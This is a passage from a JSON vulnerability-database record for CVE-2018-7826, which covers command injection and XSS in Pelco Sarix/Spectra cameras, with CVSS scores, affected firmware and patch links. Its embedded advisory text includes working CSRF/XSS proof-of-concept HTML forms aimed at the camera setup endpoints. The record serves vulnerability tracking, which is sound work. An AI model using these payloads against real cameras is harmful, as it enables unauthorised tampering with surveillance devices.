"model": "imes19-1s",
"scope": null,
"trust": 0.8,
"vendor": "schneider electric",
"version": null
},
{
"model": "sarix/spectra cameras",
"scope": null,
"trust": 0.6,
"vendor": "pelco",
"version": null
},
{
"model": "electric spectra enhanced model: d6230 2.2.0.5.9340-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: id10dn 1.8.2.18-20121109-1.9110-o3.8503",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix model: d5230 1.9.2.23-20141118-1.9330-a1.10722",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime119 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric sarix enhanced model: ime219 2.1.2.0.8280-a0.0",
"scope": "eq",
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "electric 1st gen pelco sarix enhanced camera",
"scope": null,
"trust": 0.6,
"vendor": "schneider",
"version": null
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras root remote code execution",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime219 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix enhanced - model: ime119 (firmware: 2.1.2.0.8280-a0.0)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: d5230 (firmware: 1.9.2.23-20141118-1.9330-a1.10722)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "sarix - model: id10dn (firmware: 1.8.2.18-20121109-1.9110-o3.8503)"
},
{
"model": "pelco sarix/spectra cameras multiple xss vulnerabilities",
"scope": "eq",
"trust": 0.1,
"vendor": "schneider electric se",
"version": "spectra enhanced - model: d6230 (firmware: 2.2.0.5.9340-a0.0)"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16259"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015519"
},
{
"db": "NVD",
"id": "CVE-2018-7826"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/o:schneider_electric:d6220_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:d6220l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:d6230_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:d6230l_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:ime119-1i_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:ime119-1p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:ime119-1s_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:imes19-1i_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:imes19-1p_firmware",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:schneider_electric:imes19-1s_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015519"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Vulnerability discovered by Gjoko Krstic",
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
],
"trust": 0.2
},
"cve": "CVE-2018-7826",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "PARTIAL",
"baseScore": 6.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2018-7826",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 1.8,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-23302",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"id": "CNVD-2019-16259",
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"id": "CVE-2018-7826",
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 1.8,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2018-7826",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "NVD",
"id": "CVE-2018-7826",
"trust": 0.8,
"value": "High"
},
{
"author": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2019-16259",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201905-909",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1,
"value": "(4/5)"
},
{
"author": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.1,
"value": "(3/5)"
}
]
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16259"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015519"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-909"
},
{
"db": "NVD",
"id": "CVE-2018-7826"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "A Command Injection vulnerability exists in the web-based GUI of the 1st Gen Pelco Sarix Enhanced Camera that could allow a remote attacker to execute arbitrary commands. Pelco Sarix Enhanced and Spectra Enhanced PTZ Camera Contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. PelcoSarix/SpectraCameras is a camera from Pelco. SchneiderElectric1stGenPelcoSarixEnhancedCamera is a series of fixed IP cameras from Schneider Electric, France. The vulnerability stems from the fact that external input data constructs executable commands, and the network system or product does not properly filter the special elements. An attacker could exploit the vulnerability to execute an illegal command. Pelco offers the broadest selection of IP cameras designedfor security surveillance in a wide variety of commercial and industrialsettings. The POST parameter \u0027enable_leds\u0027 locatedin the update() function called via the GeneralSetupController.phpscript is not properly sanitised before being used in writeLedConfig()function to enable led state to on or off. A remote attacker canexploit this issue and execute arbitrary system commands grantingher system access with root privileges using a specially craftedrequest and escape sequence to system shell.Tested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknownMontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)Lighttpd/1.4.28PHP/5.3.0. \nSchneider Electric Pelco Sarix/Spectra Cameras Multiple XSS Vulnerabilities\n\n\nVendor: Schneider Electric SE\nProduct web page: https://www.pelco.com\nAffected version: Sarix Enhanced - Model: IME219 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix Enhanced - Model: IME119 (Firmware: 2.1.2.0.8280-A0.0)\n Sarix - Model: D5230 (Firmware: 1.9.2.23-20141118-1.9330-A1.10722)\n Sarix - Model: ID10DN (Firmware: 1.8.2.18-20121109-1.9110-O3.8503)\n Spectra Enhanced - Model: D6230 (Firmware: 2.2.0.5.9340-A0.0)\n\nSummary: Pelco offers the broadest selection of IP cameras designed\nfor security surveillance in a wide variety of commercial and industrial\nsettings. From our industry-leading fixed and high-speed IP cameras to\npanoramic, thermal imaging, explosionproof and more, we offer a camera\nfor any environment, any lighting condition and any application. \nWhen nothing but the best will do. SarixaC/ Enhanced Range cameras\nprovide the most robust feature-set for your mission-critical applications. \nWith SureVisionaC/ 3.0, Sarix Enhanced delivers the best possible image\nin difficult lighting conditions such as a combination of bright areas,\nshaded areas, and intense light. Designed with superior reliability,\nfault tolerance, and processing speed, these rugged fixed IP cameras\nensure you always get the video that you need. \n\nDesc: Pelco cameras suffer from multiple dom-based, stored and reflected\nXSS vulnerabilities when input passed via several parameters to several\nscripts is not properly sanitized before being returned to the user. \n\nTested on: Linux 2.6.10_mvl401-1721-pelco_evolution #1 Tue Nov 18 21:15:30 EST 2014 armv5tejl unknown\n MontaVista(R) Linux(R) Professional Edition 4.0.1 (0600980)\n Lighttpd/1.4.28\n PHP/5.3.0\n\n\nVulnerability discovered by Gjoko \u0027LiquidWorm\u0027 Krstic\n @zeroscience\n\n\nAdvisory ID: ZSL-2017-5415\nAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5415.php\n\n\n07.04.2017\n\n--\n\n\nCSRF/XSS on username parameter:\n-------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/dot1x/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"dot1x\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"protocol\" value=\"EAP\u0026#45;TLS\" /\u003e\n \u003cinput type=\"hidden\" name=\"inner\u0026#95;auth\" value=\"CHAP\" /\u003e\n \u003cinput type=\"hidden\" name=\"username\" value=\u0027\"\u003e\u003cscript\u003ealert(1)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"password\" value=\"blah\" /\u003e\n \u003cinput type=\"hidden\" name=\"anonymous\u0026#95;id\" value=\"\u0026#13;\" /\u003e\n \u003cinput type=\"hidden\" name=\"ca\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"client\u0026#95;certificate\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\" value=\"test\" /\u003e\n \u003cinput type=\"hidden\" name=\"private\u0026#95;key\u0026#95;password\" value=\"test\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on gateway, hostname, ip_address, nameservers, http_port, rtsp_port and subnet_mask parameter:\n-------------------------------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"hostname\" value=\u0027\"\u003e\u003cscript\u003ealert(2)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"http\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(3)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"rtsp\u0026#95;port\" value=\u0027\"\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"dhcp\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"ip\u0026#95;address\" value=\u0027\"\u003e\u003cscript\u003ealert(5)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"subnet\u0026#95;mask\" value=\u0027\"\u003e\u003cscript\u003ealert(6)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"gateway\" value=\u0027\"\u003e\u003cscript\u003ealert(7)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"nameservers\" value=\u0027\"\u003e\u003cscript\u003ealert(8)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on version parameter:\n------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/network/snmp/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"version\" value=\u0027\";alert(9)//\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;community\u0026#95;string\" value=\"public\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;receiver\u0026#95;address\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"v2\u0026#95;trap\u0026#95;community\u0026#95;string\" value=\"trapbratce\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nCSRF/XSS on device_name, ntp_server, region, smtp_server and zone parameter:\n----------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/system/general/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"device\u0026#95;name\" value=\u0027ZSL\"\u003e\u003cscript\u003ealert(10)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;leds\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"smtp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(11)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\u0026#95;from\u0026#95;dhcp\" value=\"false\" /\u003e\n \u003cinput type=\"hidden\" name=\"ntp\u0026#95;server\" value=\"\u0027;alert(12)//\u0027\" /\u003e\n \u003cinput type=\"hidden\" name=\"region\" value=\"Macedonia\u0027;alert(13)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"zone\" value=\"Kumanovo\u0027;alert(14)//\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;time\u0026#95;overlay\" value=\"on\" /\u003e\n \u003cinput type=\"hidden\" name=\"enable\u0026#95;name\u0026#95;overlay\" value=\"off\" /\u003e\n \u003cinput type=\"hidden\" name=\"position\" value=\"topright\" /\u003e\n \u003cinput type=\"hidden\" name=\"date\u0026#95;format\" value=\"0\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n\n\nXSS on ftp_base_path, ftp_server, ftp_username, ftp_password and name parameter:\n--------------------------------------------------------------------------------\n\n\u003chtml\u003e\n \u003cbody\u003e\n \u003cscript\u003ehistory.pushState(\u0027\u0027, \u0027\u0027, \u0027/\u0027)\u003c/script\u003e\n \u003cform action=\"http://192.168.1.1/setup/events/handlers/update\" method=\"POST\"\u003e\n \u003cinput type=\"hidden\" name=\"id\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;sentinel\" value=\"relay\u0026#95;sentinel\" /\u003e\n \u003cinput type=\"hidden\" name=\"name\" value=\u0027\"\u003e\u003cscript\u003ealert(15)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"type\" value=\"Ftp\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;to\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;from\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;subject\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"email\u0026#95;message\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"limit\u0026#95;size\u0026#95;scale\" value=\"K\" /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;server\" value=\u0027\"\u003e\u003cscript\u003ealert(16)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;username\" value=\u0027\"\u003e\u003cscript\u003ealert(17)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;password\" value=\u0027\"\u003e\u003cscript\u003ealert(18)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;base\u0026#95;path\" value=\u0027\"\u003e\u003cscript\u003ealert(19)\u003c/script\u003e\u0027 /\u003e\n \u003cinput type=\"hidden\" name=\"ftp\u0026#95;dest\u0026#95;name\" value=\"IMG\u0026#37;m\u0026#37;d\u0026#37;Y\u0026#37;H\u0026#37;M\u0026#37;S\u0026#46;jpg\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;bankName\" value=\"GPIO\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;index\" value=\"0\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;on\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;off\u0026#95;time\" value=\"0\u0026#46;1\" /\u003e\n \u003cinput type=\"hidden\" name=\"relay\u0026#95;pulse\u0026#95;count\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;start0\" value=\"\" /\u003e\n \u003cinput type=\"hidden\" name=\"filter\u0026#95;stop0\" value=\"\" /\u003e\n \u003cinput type=\"submit\" value=\"Submit request\" /\u003e\n \u003c/form\u003e\n \u003c/body\u003e\n\u003c/html\u003e\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-7826"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015519"
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16259"
},
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "PACKETSTORM",
"id": "143313"
}
],
"trust": 2.97
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.zeroscience.mk/codes/pelco_rce.txt",
"trust": 0.1,
"type": "poc"
},
{
"reference": "https://www.zeroscience.mk/codes/pelco_xss.txt",
"trust": 0.1,
"type": "poc"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-7826",
"trust": 3.1
},
{
"db": "SCHNEIDER",
"id": "SEVD-2019-045-03",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015519",
"trust": 0.8
},
{
"db": "EXPLOIT-DB",
"id": "42307",
"trust": 0.7
},
{
"db": "EXPLOITDB",
"id": "42307",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2017-23302",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2019-16259",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201905-909",
"trust": 0.6
},
{
"db": "PACKETSTORM",
"id": "143313",
"trust": 0.2
},
{
"db": "ZSL",
"id": "ZSL-2017-5415",
"trust": 0.2
},
{
"db": "PACKETSTORM",
"id": "143315",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7829",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070080",
"trust": 0.1
},
{
"db": "EXPLOIT-DB",
"id": "42309",
"trust": 0.1
},
{
"db": "ZSL",
"id": "ZSL-2017-5417",
"trust": 0.1
},
{
"db": "NVD",
"id": "CVE-2018-7827",
"trust": 0.1
},
{
"db": "CXSECURITY",
"id": "WLB-2017070075",
"trust": 0.1
},
{
"db": "OTHER",
"id": "NONE",
"trust": 0.1
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16259"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015519"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-909"
},
{
"db": "NVD",
"id": "CVE-2018-7826"
}
]
},
"id": "VAR-201905-1050",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16259"
}
],
"trust": 2.3
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"ICS",
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
},
{
"category": [
"camera device"
],
"sub_category": "camera",
"trust": 0.1
}
],
"sources": [
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16259"
}
]
},
"last_update_date": "2025-01-30T22:06:48.734000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "SEVD-2019-045-03",
"trust": 0.8,
"url": "https://www.schneider-electric.com/en/download/document/SEVD-2019-045-03/"
},
{
"title": "Patch for SchneiderElectric1stGenPelcoSarixEnhancedCamera Command Injection Vulnerability (CNVD-2019-16259)",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/162757"
},
{
"title": "Schneider Electric 1st Gen Pelco Sarix Enhanced Camera Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=92887"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2019-16259"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015519"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-909"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015519"
},
{
"db": "NVD",
"id": "CVE-2018-7826"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.schneider-electric.com/en/download/document/sevd-2019-045-03/"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-7826"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7826"
},
{
"trust": 0.7,
"url": "https://www.exploit-db.com/exploits/42307/"
},
{
"trust": 0.1,
"url": "https://www.exploit-db.com/exploits/42309/"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070080"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143315"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129667"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7829"
},
{
"trust": 0.1,
"url": "https://cxsecurity.com/issue/wlb-2017070075"
},
{
"trust": 0.1,
"url": "https://packetstormsecurity.com/files/143313"
},
{
"trust": 0.1,
"url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/129665"
},
{
"trust": 0.1,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7827"
},
{
"trust": 0.1,
"url": "https://ieeexplore.ieee.org/abstract/document/10769424"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/dot1x/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/system/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/events/handlers/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/general/update\""
},
{
"trust": 0.1,
"url": "http://192.168.1.1/setup/network/snmp/update\""
},
{
"trust": 0.1,
"url": "https://www.pelco.com"
},
{
"trust": 0.1,
"url": "http://www.zeroscience.mk/en/vulnerabilities/zsl-2017-5415.php"
}
],
"sources": [
{
"db": "ZSL",
"id": "ZSL-2017-5417"
},
{
"db": "ZSL",
"id": "ZSL-2017-5415"
},
{
"db": "OTHER",
"id": null
},
{
"db": "CNVD",
"id": "CNVD-2017-23302"
},
{
"db": "CNVD",
"id": "CNVD-2019-16259"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015519"
},
{
"db": "PACKETSTORM",
"id": "143313"
},
{
"db": "CNNVD",
"id": "CNNVD-201905-909"
},
{
"db": "NVD",
